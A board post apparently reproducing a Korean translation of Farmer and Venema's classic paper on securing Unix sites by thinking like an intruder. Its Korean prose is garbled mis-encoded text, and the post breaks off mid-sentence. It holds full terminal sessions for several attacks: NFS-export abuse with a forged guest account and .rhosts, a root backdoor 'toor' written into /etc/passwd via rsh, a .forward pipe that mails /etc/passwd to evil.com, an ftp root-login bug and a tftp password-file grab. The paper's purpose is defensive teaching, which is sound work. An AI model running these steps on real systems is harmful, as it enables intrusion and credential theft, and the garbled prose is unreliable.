Linux Information
 
ÃÑ °Ô½Ã¹° 125°Ç, ÃÖ±Ù 0 °Ç
   
½Ã½ºÅÛ°ø°ÝÁ¡°ËÀ» ÅëÇÑ º¸¾È °³¼± ¹æ¾È
±Û¾´ÀÌ : ½Å¿µÃ¶ ³¯Â¥ : 2013-01-18 (±Ý) 13:23 Á¶È¸ : 20284

½Ã½ºÅÛ°ø°ÝÁ¡°ËÀ» ÅëÇÑ º¸¾È °³¼± ¹æ¾È

Dan Farmer

Sun Microsystems
2550 garcia ave MS PAL1-407
Mountain View CA 94043
zen@sun.com

Wietse Venema

Eindhoven University of Technology
P.O. Box 513, 5600 MB
Eindhoven, NL

wietse@wzv.win.tue.nl


°³¿ä

ÃÖ±Ù Àü»ê¸ÁÀ» ÅëÇÑ Ä§ÀÔÀÌ ¸Å¿ì Àæ¾ÆÁö°í ÀÖÀ¸¸ç, ÀÌ ¼ö¹ýµéµµ ¸Å¿ì º¹ÀâÇØÁö´Â
¼öÁØ¿¡ ÀÖ´Ù. ¸¹Àº °æ¿ì°¡ ÆÐ½º¿öµåÀÇ ¹®Á¦Á¡¿¡ ±âÀÎÇÏ´Ù°í ¹ÏÁö¸¸ ÃÖ±Ù º¸´Ù
¿ì¼öÇÑ Ä§ÀÔ±â¹ýÀ» ÀÌ¿ëÇÏ´Â °æ¿ì°¡ ¸¹ÀÌ ¹ß°ßµÈ´Ù. ÀÌ·¯ÇÑ ±â¹ýµéÀº Àß ¹ß°ßµÇ±â
¾î·Á¿ì¹Ç·Î ¾ÆÁ÷Àº ´ú ¾Ë·ÁÁ® ÀÖ´Â ½ÇÁ¤ÀÌ´Ù.

º¸ÅëÀÇ ½Ã½ºÅÛ Ä§ÀÔÀÚµéÀÇ À̹ÌÁö¶ó°í ÇÒ ¼ö ÀÖ´Â ´Ü¼øÇÑ ½Ã½ºÅÛ id ÀÇ ¹Ýº¹ÀûÀÎ
½Ãµµ°¡ ¾Æ´Ï¶ó º¸´Ù À§ÇèÇÑ °æ¿ìµéÀÌ ÀÖ´Ù. ÃÖ±ÙÀÇ ½Ã½ºÅÛ °¨»ç ¹× ħÀÔµµ±¸ÀÇ
»ç¿ë¹ýÀ» Àß ¾Ë°í Àִٵ簡, ¾î¶² ƯÁ¤ °ø°Ý ¹æ¹ýÀ» ¼öÁ¤ÇÒ ¼ö Àִٵ簡, ¶Ç ÀÚ½Å
ÀÌ ½º½º·Î ÇÁ·Î±×·¥À» ¸¸µé ¼ö Àִٵ簡 ÇÏ´Â ½ÄÀÇ Àü¹® ħÀÔÀÚµéÀÌ ±×µéÀÌ´Ù.
¶ÇÇÑ »õ·Î ¹ß°ßµÈ ½Ã½ºÅÛÀÇ Ãë¾àÁ¡À» Àß ¾Ë¼ö Àִٵ簡, »õ·Î¿î ¹ö±×³ª Ãë¾àÁ¡µéÀ»
¹ß°ßÇϱ⵵ Çϴµ¥, À̵éÀ» "Uebercracker"¶ó°í ÇÑ´Ù.


°³¿ä

ÀÌ ³í¹®¿¡¼­´Â ÀϹÝÀûÀÎ ½Ã½ºÅÛº¸¾È¿¡ ´ëÇÑ Á¢±Ù¹æ¹ýÀ» ¾ê±âÇÏ´Â °ÍÀÌ ¾Æ´Ï¸ç,
ÀáÀçÀûÀΠħÀÔÀÚÀÇ ÀÔÀå¿¡¼­ "¾î¶»°Ô", "¿Ö"¶ó´Â ÀÔÀå¿¡¼­ Á¢±ÙÇϰíÀÚ ÇÑ´Ù.
½Ã½ºÅÛÀÇ Ãë¾àÁ¡À» ã±âÀ§ÇØ ºÒÇÊ¿äÇÑ ³×Æ®¿öÅ© ¼­ºñ½º°¡ µµ¿òÀ» ÁÖ´Â µµ±¸À̸ç,
ÀÌ·¯ÇÑ ¼­ºñ½ºµéÀÌ ¿î¿µÃ¼Á¦¿¡¼­ Á¤È®ÇÏ°Ô µ¿ÀÛÇÑ´Ù Çϵµ¶óµµ ÀÌ·¯ÇÑ µµ±¸°¡ µÉ
¼ö ÀÖ´Â °ÍÀÌ´Ù.

¿©±â¿¡¼­´Â º¸´Ù ¿ì¼öÇÑ Ä§ÀÔ¹æ¹ýµé¿¡ ´ëÇØ ÃÊÁ¡À» ¸ÂÃß°í, ħÀÔÀÚµéÀÌ »ç¿ëÇÏ´Â
ȤÀº ½Ã½ºÅÛÀÇ ½ÃÇè µîÀ» ÅëÇØ ħÀÔÀÚµéÀ» Á¡°ËÇÏ´Â °Í¿¡ ´ëÇØ ¾Ë¾Æ º»´Ù. º¸Åë
½Ã½ºÅÛ°ü¸®ÀÚµéÀÌ °£°úÇϱ⠽¬¿î ÀϹÝÀûÀÎ °ø°Ý ÀÌ»ó¿¡ ´ëÇØ ¾Ë¾Æº¸°íÀÚ Çϸç,
¾î¶² ÀÚ¿øÀÌ º¸È£µÇ¾î¾ß ÇÑ´Ù´Â °ÍÀ» Àß ¾Ë°í´Â ÀÖÁö¸¸ ³×Æ®¿öÅ©³ª ½Ã½ºÅÛÀÇ º¸È£
¸¦ À§ÇØ ¾î¶² ¼öÁØÀÇ Æò°¡°¡ ÇÊ¿äÇÑÁö´Â Àß ¸ð¸£°í ÀÖ´Ù´Â Á¡µµ ¾Ë¾Æ¾ß ÇÑ´Ù.
ħÀÔÀÚµéÀÌ ¾î¶² Á¢±ÙÀ» ÇÏ·Á°í ÇÏ´ÂÁö¸¦ º¸ÀÓÀ¸·Î¼­ ½Ã½ºÅÛ°ü¸®ÀÚµéÀÌ ¾î¶»°Ô
º¸¾ÈÀ» ¼¼´­ °ÍÀÎÁö °áÁ¤Çϴµ¥ µµ¿òÀ» ÁÖ°íÀÚ ÇÑ´Ù.

ÀÌ ³í¹®¿¡¼­´Â ´Ü¼øÈ÷ ½Ã½ºÅÛÀÇ ¹ö±×³ª º¸¾ÈÃë¾àÁ¡À» ³ª¿­ÇÏÁö´Â ¾Ê´Â´Ù. ÀÌ ³í¹®
ÀÇ ¸ñÀûÀº ¾î¶² °ü¸®ÀÚ°¡ ÀÚ½ÅÀÇ ½Ã½ºÅÛÀÇ º¸¾ÈÀ» À§ÇØ »õ·Î¿î °üÁ¡¿¡¼­ ħÀÔ
°¡´É¼ºÀ» ÀÌÇØ½Ã۰íÀÚ ÇÔÀÌ´Ù.

ÀÌ ³í¹®¿¡´Â 4°³ÀÇ ÁÖµÈ ºÎºÐÀ¸·Î ³ª´©¾îÁø´Ù. ù°´Â °³¿äÀ̸ç, µÎ¹øÂ° ºÎºÐÀº
ħÀÔÀÚµéÀÌ ¾î¶»°Ô ½Ã½ºÅÛÀÇ º¸¾È ¸ÞÄ«´ÏÁò¿¡ ´ëÇØ ¸ð¸£¸é¼­ ħÀÔÇÒ ¼ö ÀÖ´ÂÁö
±× °æÇâÀ» ¾Ë°Ô±Ý ÇÏ´Â ºÎºÐÀε¥ ½ÇÁúÀûÀÎ ³×Æ®¿öÅ©ÀÇ º¸¾ÈÃë¾àÁ¡À» ¾î¶»°Ô ¾Ë¾Æ
³»°í Á¤º¸¸¦ ¾Ë¾Æ³» µé¾î°¡´Â°¡¿¡ ´ëÇÑ ±¸Ã¼ÀûÀÎ ±â¹ýµéÀ» º¸ÀδÙ. ¿©±â¿¡¼­´Â
ƯÈ÷ NIS³ª NFS µîÀ» ÀÌ¿ëÇÑ ±â¹ý µî¿¡ ´ëÇØ¼­µµ Á¶±Ý ´Ù·ê °ÍÀ̸ç, ½Ã½ºÅÛÀ̳ª
¿î¿µÃ¼Á¦¿¡ ƯÁ¤ÀûÀÎ ±¸¼º¹®Á¦ µî¿¡ ´ëÇØ¼­µµ ´Ù·ç¸ç, ÀÌ¿¡ ´ëÇÑ ´ëºñÃ¥µµ º¸ÀÏ
°ÍÀÌ´Ù.

¼¼¹øÂ° ºÎºÐ¿¡¼­´Â ¾î¶»°Ô ½Ã½ºÅÛÀÇ º¸¾ÈÀÌ ´Ù¸¥ ½Ã½ºÅÛÀÇ ¹«°á¼º¿¡ µû¶ó ´Þ¶ó
Áö´ÂÁö º¸ÀÏ °ÍÀ̸ç, ÀÌ·¯ÇÑ ½Å·Ú(Trust)¹®Á¦´Â ¸Å¿ì º¹ÀâÇÑ À̽´ÀÌ´Ù.

³×¹øÂ° ºÎºÐ¿¡¼­´Â ½Ã½ºÅÛ °ü¸®ÀÚµéÀÌ ÃëÇØ¾ß ÇÒ º¸¾ÈÀÇ ±âº»ÀûÀÎ ÀýÂ÷¿¡ ´ëÇØ
¸»ÇϰíÀÚ ÇÑ´Ù.

ÀÌ ³í¹®ÀÇ »ç·Ê³ª, º¸¾È °ü·Ã Á¤º¸, ¼ÒÇÁÆ®¿þ¾î µîÀº ÀÌ ³í¹®ÀÇ ¸¶Áö¸·¿¡ ºÎ·Ï
¿¡¼Ò º¸À̰í ÀÖ´Ù.

ÀÌ ³í¹®¿¡¼­ ¼³¸íµÈ ħÀÔ ¹æ¹ý, ±â¹ýµéÀº SATATN(Security Analysis Tool for
Auditing Networks.) À» ¿ì¸®´Â ¹ßÇ¥ÇÏ¿´´Ù. À̰ÍÀº shell, perl, C µîÀ¸·Î ¸¸µé
¾úÀ¸¸ç, ¿ø°ÝÁöÀÇ ½Ã½ºÅÛ¿¡ ´ëÇØ NIS, finger, NFS, ftp and tftp, rexd µîÀ»
°Ë»çÇÒ ¼ö ÀÖ´Ù. »Ó¸¸ ¾Æ´Ï¶ó ÀáÀçÀûÀÎ º¸¾È ¹®Á¦·Î¼­, À߸øµÈ ½Ã½ºÅÛ ±¸¼º, Àß
¸øµÈ ³×Æ®¿öÅ© ¼­ºñ½º ±¸¼º, ½Ã½ºÅÛÀ̳ª ³×Æ®¿öÅ©ÀÇ Àß ¾Ë·ÁÁø ¹ö±× µîÀ» Á¡°Ë
ÇÏ°Ô µÈ´Ù. À̰ÍÀº µ¥ÀÌŸ³ª ÀáÀçÀûÀÎ º¸¾È ¹®Á¦¸¦ ÇâÈÄ °Ë»çÇϱâ À§ÇÑ Àü¹®°¡
½Ã½ºÅÛÀ» Á¦°øÇÑ´Ù. ºÎ·Ï A°¡ ÀÌ·¯ÇÑ ±â´ÉµéÀ» º¸¿©ÁÖ°í ÀÖ´Ù.

ÀÌ ÇϳªÀÇ ³í¹®¿¡¼­ ¸ðµç ħÀÔ¹æ¹ýµéÀ» ´Ù ´Ù·ê ¼ö´Â ¾øÀ¸¸ç, ¶ÇÇÑ ¿ì¸®ÀÇ °ü½ÉÀÌ
¾Æ´Ï´Ù. »çȸ°øÇÐÀ̳ª ÆÐ½º¿öµå Cracking µîÀÌ ÀÖÀ¸³ª °¡·É ÆÐ½º¿öµå °ø°Ý¹æ¹ý¿¡
´ëÇØ¼­´Â »ç½Ç ¿©±â¿¡¼­µµ ´Ù·ç°í ÀÖÀ¸¸ç, ƯÈ÷ X Window °ø°Ýµµ ÀÖÁö¸¸ »ç½Ç ´ë
ºÎºÐÀÇ Ä§ÀÔÀÚµéÀÌ ÀÌ·¯ÇÑ ºñÆ®¸ÊÀ» º¼ ¼ö ÀÖ´Â ´Ü¸»±âµîÀ» °¡Áö°í ÀÖÁö ¾Ê±â ¶§
¹®¿¡ ¿©±â¿¡ ±â¼úÇÏÁö ¾Ê´Â´Ù.


Á¤º¸¸¦ ȹµæÇϱâ

¸Ç ¸ÕÀú ¹«¾ùÀ» ÇÒ °ÍÀΰ¡? ¸ÕÀú ¼Ò¼ÓÇÑ °ø°Ý ´ë»ó ½Ã½ºÅÛÀÇ Á¤º¸¸¦ ¼öÁýÇ϶ó.
ÀÌ °ÍÀ» ¾Ë ¼ö ÀÖ´Â ¹æ¹ýÀÌ ÀÖ´Ù. finger, showmount, rpcinfoµîÀ» ¸ÇóÀ½ ÀÌ¿ëÇÒ
¼ö ÀÖÀ» °ÍÀÌ´Ù. ÇÏÁö¸¸ ±×¹Û¿¡µµ DNS, whois, sendmail(smtp), ftp, uucp µîÀÇ
¿©·¯°¡Áö ±â¹ýµéÀ» ÀÌ¿ëÇÒ ¼ö ÀÖÀ¸¸ç ÀÌ·¯ÇÑ Á¤º¸µéÀº ¼Ò¼Ó ±â°üÀÇ Àüü ³×Æ®¿öÅ©
ħÀÔ¿¡ ÀÌ¿ëµÉ ¼ö ÀÖÁö¸¸ Áö±ÝÀº ¿ì¼± ´ÜÁö ƯÁ¤ ¸ñÇ¥½Ã½ºÅÛ¿¡ ´ëÇØ ¾Ë¾Æº»´Ù.

¸ÕÀú finger ¸í·ÉÀ» º¸µµ·Ï ÇÑ´Ù.

victim % finger @victim.com
[victim.com]
Login      Name            TTY Idle    When    Where
zen      Dr.  Fubar          co  1d  Wed 08:00  death.com

À̰ÍÀº ÇϳªÀÇ »ç¿ëÀÚÀ̸ç, ÇöÀç IdleÇϹǷΠ¾Æ¹«µµ ´ç½ÅÀÇ Ä§ÀÔ¿¡ ´ëÇØ ½Å°æ¾²Áö
¾ÊÀ» °ÍÀÌ´Ù. ¶Ç ´Ù¸¥ Àü·«À¸·Î¼­, "@", "0", "", root, bin, ftp, system, guest,
demo, manager, µîÀ» fingerÇÏ¿© º¸´Ù ¸¹Àº Á¤º¸µéÀ» º¸±â·Î ÇÑ´Ù. ÀÌ·¯ÇÑ Á¤º¸µéÀº
½Ã½ºÅÛÀÇ ¹öÁ¯¿¡ µû¶ó ´Ù¸£Áö¸¸ º¸Åë °èÁ¤À̸§°ú Ȩ µð·ºÅ丮, ¸¶Áö¸· ·Î±×ÀÎÇÑ
È£½ºÆ® À̸§ µåÀ» ¹àÇô ÁÖ°Ô µÈ´Ù.

¿©±â¿¡ ´õÇØ »ç¿ëÀÚµéÀÇ Á¤º¸¸¦ º¸±â À§ÇØ rusers("-l"¿É¼ÇÀ¸·Î)¸¦ »ç¿ëÇÑ´Ù.
À̰ÍÀ¸·Î victim.com Àº ´ÙÀ½À» ´õ º¸¿©ÁÙ °ÍÀÌ´Ù.

 Login  Home-dir    Shell      Last login, from where
 -----  --------    -----      ----------------------
 root    /          /bin/sh    Fri Nov 5 07:42 on ttyp1 from big.victim.com
 bin    /bin                  Never logged in
 nobody  /                      Tue Jun 15 08:57 on ttyp2 from server.victim.co
 daemon  /                      Tue Mar 23 12:14 on ttyp0 from big.victim.com
 sync    /          /bin/sync  Tue Mar 23 12:14 on ttyp0 from big.victim.com
 zen    /home/zen  /bin/bash  On since Wed Nov  6 on ttyp3 from death.com
 sam    /home/sam  /bin/csh  Wed Nov  5 05:33 on ttyp3 from evil.com
 guest  /export/foo /bin/sh    Never logged in
 ftp    /home/ftp              Never logged in

SATANÀ̳ª ħÀÔÀÚµéÀÇ È°µ¿À» º¸´Â °æÇè¿¡ ºñÃß¾î finger ´Â ¸Å¿ì À§ÇèÇÑ ¼­ºñ½º
ÀÌ´Ù. ÇÏÁö¸¸ À̰ÍÀº ´Ù¸¥ µ¥ÀÌŸ¿Í ÇÔ²² Ȱ¿ëÇÏ¸é ´õ¿í À¯¿ëÇÏ°Ô µÈ´Ù.

¿¹¸¦ µé¾î showmount ¸¦ ½ÇÇàÇÏ¿© º¸ÀÚ.

 evil % showmount -e victim.com
 export list for victim.com:
 /export                            (everyone)
 /var                              (everyone)
 /usr                              easy
 /export/exec/kvm/sun4c.sunos.4.1.3 easy
 /export/root/easy                  easy
 /export/swap/easy                  easy

/export/foo °¡ ¿ÏÀüÈ÷ °³¹æµÇ¾î ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù. »Ó¸¸ ¾Æ´Ï¶ó À̰ÍÀÇ »ç¿ëÀÚ´Â
guestÀÇ È¨µð·ºÅ丮ÀÌ´Ù.  ÀÌ °æ¿ì "guest" »ç¿ëÀÚÀÇ È¨µð·ºÅ丮¸¦ ¸¶¿îÆ®ÇÏ¿©
ħÀÔ¿¡ ¼º°øÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ ´ëÀÀµÇ´Â °èÁ¤µµ ¾øÀ¸¸ç, root°¡
NFS ¸¶¿îÆ®µÈ ÆÄÀϽýºÅÛÀÇ ÆÄÀÏÀ» ¼öÁ¤ÇÒ ¼ö ¾øÀ¸¹Ç·Î ÀÚ½ÅÀÇ ½Ã½ºÅÛÀÌ ÀÖ´Â
ÆÐ½º¿öµå ÆÄÀÏ¿¡ "guest" °èÁ¤À» ¸¸µç´Ù. ¸ñÇ¥½Ã½ºÅÛÀÇ "guest" Ȩ µð·ºÅ丮¿¡
.rhosts ¸¦ ¸¸µé¾î ÆÐ½º¿öµå ¾øÀÌ ·Î±×ÀÎÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù.

 evil # mount victim.com:/export/foo /foo
 evil # cd /foo
 evil # ls -lag
 total 3
    1 drwxr-xr-x 11 root    daemon        512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root    wheel        512 Jul 19  1991 ..
    1 drwx--x--x  9 10001    daemon      1024 Aug  3 15:49 guest
 evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
 evil # ls -lag
 total 3
    1 drwxr-xr-x 11 root    daemon        512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root    wheel        512 Jul 19  1991 ..
    1 drwx--x--x  9 guest    daemon      1024 Aug  3 15:49 guest
 evil # su guest
 evil % echo evil.com >> guest/.rhosts
 evil % rlogin victim.com
        Welcome to victim.com!
 victim %

¸¸¾à Ȩµð·ºÅ丮°¡ ¾Æ´Ñ »ç¿ëÀÚ ¸í·É¾î(/usr or /usr/local/bin)µð·ºÅ丮¸¦ °³¹æÇÏ
¿´´Ù¸é, ¸í·É¾î¸¦ ´ç½ÅÀÇ Àǵµ´ë·Î ¸¸µç Æ®·ÎÀ̸ñ¸¶ ÇÁ·Î±×·¥µîÀ¸·Î ´ëÄ¡ÇØ µÎ¸é
´ÙÀ½ »ç¿ëÀÚ°¡ À̸¦ ½ÇÇàÇÏ¸é ´ç½ÅÀÌ ¿øÇÏ´Â ¸í·ÉÀ» ¸ñÇ¥ ½Ã½ºÅÛ¿¡ ½ÇÇàÇÒ ¼ö ÀÖ´Ù.

ÆÄÀÏ ½Ã½ºÅÛÀº,

- Ưº°È÷ ½Å·ÚÇϴ Ŭ¾ÆÀÌ¾ðÆ®¿¡¸¸ read/write only ·Î °³¹æÇϸç,
- °¡´ÉÇÑ Read-only·Î ¸¸µç´Ù.

¸¸¾à /etc/hosts.equiv ¿¡ "+"¸¦ °¡Áö°í ÀÖ´Ù¸é(´ëºÎºÐ ¾÷ü¿¡¼­´Â À̰ÍÀÌ µðÆúÆ®)
ȤÀº netgroups ¹ö±×(CERT advisory 91:12)ÀÇ °æ¿ì ¸ñÇ¥½Ã½ºÅÛÀÇ ÆÐ½º¿öµå ÆÄÀϳ»
¿¡ ÀÖ´Â °èÁ¤À» °¡Áø »ç¿ëÀÚ¸é ÆÐ½º¿öµå ¾øÀÌ ·Î±×ÀÎÇÒ ¼ö ÀÖ´Ù. "bin" »ç¿ëÀÚ´Â
Áß¿äÇÑ µð·ºÅ丮³ª ÆÄÀÏÀ» ¼ÒÀ¯ÁÖÀ̹ǷΠ¸ñÇ¥½Ã½ºÅÛ¿¡ ´ÙÀ½ µé¾î°¥ °æ¿ì¿¡´Â root
·Î Á¢±ÙÇÒ ¼ö ÀÖµµ·Ï ÆÐ½º¿öµå ÆÄÀÏÀ» ¼öÁ¤ÇÒ ¼ö ÀÖ´Ù. 

 evil % whoami
 bin
 evil % rsh victim.com csh -i
 Warning: no access to tty; thus no job control in this shell...
 victim %  ls -ldg /etc
 drwxr-sr-x  8 bin      staff        2048 Jul 24 18:02 /etc
 victim %  cd /etc
 victim %  mv passwd pw.old
 victim %  (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
 victim % ^D
 evil % rlogin victim.com -l toor
        Welcome to victim.com!
 victim #

rsh À» finger³ª who·Î º¸ÀÌÁö ¾Êµµ·Ï wtmp³ª utmp ½Ã½ºÅÛ ·Î±×¸¦ ÀÌ¿ëÇÑ ¾î¶²
ÃßÀûµµ ³²±âÁö ¾ÊÀ¸¹Ç·Î ½Ã½ºÅÛ¿¡  Á¢±ÙÇÒ ¼ö ÀÖ´Ù. COPS(ºÎ·ÏD) Àº °ü¸®ÀÚ°¡ ¾Æ´Ñ
¾î¶°ÇÑ »ç¿ëÀÚ°¡ ÁÖ¿äÇÑ ÆÄÀÏ¿¡ ´ëÇØ ¾²±â±ÇÇÑÀ» °¡Áú ¼ö ÀÖ´ÂÁö º¸°íÇÑ´Ù.
¸¸¾à SunOS 4.x À» »ç¿ëÇÑ´Ù¸é ÆÐÄ¡ 100103 À» ÀÌ¿ëÇÏ¿© ÆÄÀÏ Á¢±Ù ±ÇÇѹ®Á¦¸¦
ÇØ°áÇÒ ¼ö ÀÖ´Ù. À§ÀÇ rsh ¹æ¹ýÀº Àû´çÇÑ ÀڷḦ ³²±âÁö ¾ÊÀ¸¹Ç·Î tcp wrapper
(ºÎ·Ï D)´Â µé¾î¿À´Â Á¢¼Ó¿¡ ´ëÇØ Àû´çÇÑ ·Î±×¸¦ ³²±ä´Ù.

 
---------------------------------------------------------------------------
ÀÌÁ¦ ¹«¾ùÀ» Çϳª? ¸ñÇ¥ ½Ã½ºÅÛÀÇ ¸ðµç Ãë¾àÁ¡À» ´Ù ãÀº °ÍÀÌ ¾Æ´Ò °ÍÀÌ´Ù.       
´Ù½Ã "finger" ¸¦ ÀÌ¿ëÇÏ¿© ¸ñÇ¥ ½Ã½ºÅÛÀÌ "ftp" °ÔÁ¤À» °¡Áö°í ÀÖ´Ù´Â °ÍÀ» ¾Ë°Ô
µÈ´Ù¸é, ÀÌ´Â anonymous ftp¸¦ ±¸¼ºÇϰí ÀÖ´Ù´Â °ÍÀ» ¾Ë·ÁÁÖ´Â °ÍÀÌ´Ù.
anonymous ftp´Â À߸ø ±¸¼ºµÊÀ¸·Î¼­ ½±°Ô ¿ÜºÎ¿¡¼­ Á¢±Ù ÇÒ ¼ö ÀÖ°Ô ÇØÁØ´Ù.
¿¹¸¦ µé¾î ¸ñÇ¥ ½Ã½ºÅÛÀÌ ~ftp/etc µð·ºÅ丮¿¡ /etc/passwd ÆÄÀÏ Àüü Ä«ÇǸ¦
°¡Áö°í ÀÖ´Ù¸é victim.comÀÇ ftp °èÁ¤ÀÇ È¨µð·ºÅ丮´Â ¾²±â°¡ °¡´ÉÇØÁø´Ù.
À̰ÍÀº ¸ñÇ¥½Ã½ºÅÛ¿¡ remote ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖµµ·Ï ÇØÁÖ´Â, ¿¹¸¦ µé¾î ÀüÀÚ¿ìÆí
À» ÅëÇØ ÆÐ½º¿öµå ÆÄÀÏÀ» º¸³»°ÔÇѴٵ簡 ÇÏ´Â ½ÄÀÇ, Áï ftp·Î ¸ÞÀÏÀÌ ¿ÔÀ» ¶§
¸í·ÉÀ» ½ÇÇàÇϵµ·Ï .forward ÆÄÀÏÀ» ¸¸µé ¼ö ÀÖ´Â °ÍÀÌ´Ù. À̰ÍÀº "vacation"
ÇÁ·Î±×·¥ÀÌ ¸ÞÀÏ¿¡ ÀÚµ¿ ÀÀ´äÇϵµ·Ï »ç¿ëÇÏ´Â ÆÄÀÌÇÁÀÇ °³³äÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù.

 evil % cat forward_sucker_file
 "|/bin/mail zen@evil.com < /etc/passwd"

 evil % ftp victim.com
 Connected to victim.com
 220 victim FTP server ready.
 Name (victim.com:zen): ftp
 331 Guest login ok, send ident as password.
 Password:
 230 Guest login ok, access restrictions apply.
 ftp> ls -lga
 200 PORT command successful.
 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
 total 5
 drwxr-xr-x  4 101      1            512 Jun 20  1991 .
 drwxr-xr-x  4 101      1            512 Jun 20  1991 ..
 drwxr-xr-x  2 0        1            512 Jun 20  1991 bin
 drwxr-xr-x  2 0        1            512 Jun 20  1991 etc
 drwxr-xr-x  3 101      1            512 Aug 22  1991 pub
 226 ASCII Transfer complete.
 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
 ftp> put forward_sucker_file .forward
 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
 ftp> quit
 evil % echo test | mail ftp@victim.com

ÀÌÁ¦ ´ç½ÅÀº ´Ü¼øÈ÷ ÆÐ½º¿öµå ÆÄÀÏÀÌ ¿Ã¶§ ±îÁö ±â´Ù¸®¸é µÇ´Â °ÍÀÌ´Ù.             

COPS°¡ Anonymous FTP °¡ ¿Ã¹Ù¸¥Áö Á¡°ËÇÒ ¼ö ÀÖÀ¸¸ç, ftp ¸Å´º¾ó ÆäÀÌÁö³ª,       
COPSÀÇ ¹®¼­³ª ÄÚµå ȤÀº CERT-Advisory 93:10 À» Âü°íÇÏ¿© ¿Ã¹Ù¸£°Ô Anonymous
FTP¸¦ ¼³Ä¡ÇÒ ¼ö ÀÖµµ·Ï ÇÑ´Ù. ftp ÀÇ Ãë¾à¼ºÀº ÁÖ¿äÇÑ ÆÄÀÏÀ̳ª µð·ºÅ丮ÀÇ
À߸øµÈ ¼ÒÀ¯ÁÖ ¹®Á¦¿¡¼­µµ ºñ·ÔµÉ ¼ö ÀÖÀ¸¸ç, ÃÖ¼ÒÇÑ ~ftp¿Í ~ftp ¾Æ·¡¿¡ ÀÖ´Â
¸ðµç ½Ã½ºÅÛµð·ºÅ丮 ¹× ÆÄÀÏÀÇ ¼ÒÀ¯ÁÖ·ê root·Î ÇØ¾ß Çϸç, ±âŸ ¾î¶² »ç¿ëÀÚ
¿¡°Ôµµ ¾²±â ±ÇÇÑÀ» Çã¿ëÇØ¼­´Â ¾ÈµÈ´Ù.
 
ftp ¿¡ ´ëÇØ¼­´Â ¿¹Àü¿¡µµ ¸¹ÀÌ °ø°ÝÇÏ´Â ¼ö¹ýÀÇ ´ë»óÀÌ µÈ ¹ö±×¸¦ ÀÌ¿ëÇÒ ¼ö
ÀÖ´Ù.                             

 % ftp -n
 ftp> open victim.com
 Connected to victim.com
 220 victim.com FTP server ready.
 ftp> quote user ftp
 331 Guest login ok, send ident as password.
 ftp> quote cwd ~root
 530 Please login with USER and PASS.
 ftp> quote pass ftp
 230 Guest login ok, access restrictions apply.
 ftp> ls -al / (or whatever)

¸¸¾à À̰ÍÀÌ µ¿À۵ȴٸé root·Î ·Î±×ÀÎÇÏ¿© ÆÐ½º¿öµå ÆÄÀÏÀ» ¼öÁ¤Çϰųª ¾î¶²       
ÀÛ¾÷µµ ÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ¸¸¾à ÀÌ·± ¹ö±×¸¦ ¾ÆÁ÷ °¡Áö°í ÀÖ´Ù¸é ¾÷ü³ª ftp.uu.net
¿¡¼­ »õ ¹öÁ¯À» °¡Á®¿Í ±³Ã¼ÇØ¾ß ÇÑ´Ù.
±âÁ¸ÀÇ ftp ±³Ã¼ ¹öÁ¯ÀÎ Washington ´ëÇп¡¼­ ¸¸µç wuarchive ftpµµ °°Àº ¹®Á¦¸¦
°¡Áö°í ÀÖÀ¸¸ç 1993 4¿ù 8ÀÏ ÀÌÀü ¹öÁ¯À» »ç¿ëÇÑ´Ù¸é ÃֽŹöÁ¯À¸·Î ±³Ã¼ÇØ¾ß ÇÑ´Ù.
¸¶Áö¸·À¸·Î ftp¿Í À¯»çÇÑ tftp°¡ Àִµ¥, ÆÐ½º¿öµå³ª ´Ù¸¥ ÀÎÁõÀ» °ÅÄ¡Áö ¾Ê´Â
¹æ¹ýÀ̹ǷΠinetd.conf¿¡ secure ¿É¼ÇÇ÷¡±×¸¦ µÎ¾î Á¢±ÙÀ» Á¦ÇÑÇÏÁö ¾Ê´Â´Ù¸é
ħÀÔÀÚ´Â ¾î¶°ÇÑ µð·ºÅ丮ÀÇ ¾î¶² ÆÄÀÏ¿¡ ´ëÇØ¼­µµ Àбâ/¾²±â°¡ °¡´ÉÇØÁø´Ù.
º¸Åë À̸¦ ÅëÇØ ÆÐ½º¿öµå ÆÄÀÏÀ» °¡Á®¿Í¼­ /tmpµð·ºÅ丮¿¡ µÑ ¼ö ÀÖ´Ù.

 evil % tftp
 tftp> connect victim.com
 tftp> get /etc/passwd /tmp/passwd.victim
 tftp> quit
 
º¸¾ÈÀ» À§ÇØ °¡´ÉÇÑ tftp´Â »ç¿ëÇÏÁö ¾Ê´Â °ÍÀÌ ÁÁÀ¸¸ç, ¸¸¾à ÇÊ¿äÇÏ´Ù¸é, °ø°³Çϴ 
Á¤º¸¸¸ ÀÖ´Â µð·ºÅ丮·Î Á¢±ÙÀ» Á¦ÇÑÇÑ secure ¿É¼Ç ÇÁ·¡±×¸¦ µÎ¾î »ç¿ëÇϰųª
chroot wrapper ÀÇ Á¦¾îÇÏ¿¡ »ç¿ëÇÑ´Ù.
 
ÀÌ»óÀÇ ¹æ¹ýÀÌ ÅëÇÏÁö ¾Ê´Â °æ¿ì ¾î¶² Àǹ̿¡¼­´Â finger º¸´Ù ´õ¿í Æí¸®ÇÑ rpcinfo
¸¦ »ç¿ëÇÒ ¼ö ÀÖ´Ù. rpc¸¦ ÀÌ¿ëÇÏ´Â ¸¹Àº ½Ã½ºÅÛÀÌ °ø°Ý´çÇÒ ¼ö Àִµ¥, rpcinfo°¡
portmapper¿Í ´ëÈ­ÇÏ¿© ±× ¹æ¹ýÀ» ¾Ë·ÁÁØ´Ù. È£½ºÆ®°¡ NIS¸¦ »ç¿ëÇÏ´ÂÁö, NIS°¡ ¼­¹ö
ÀÎÁö slaveÀÎÁö, µð½ºÅ©¾ø´Â ¿öÅ©½ºÅ×À̼ÇÀÌ ÀÖ´ÂÁö ¾ø´ÂÁö, rusersd³ª rstatd µîÀÇ
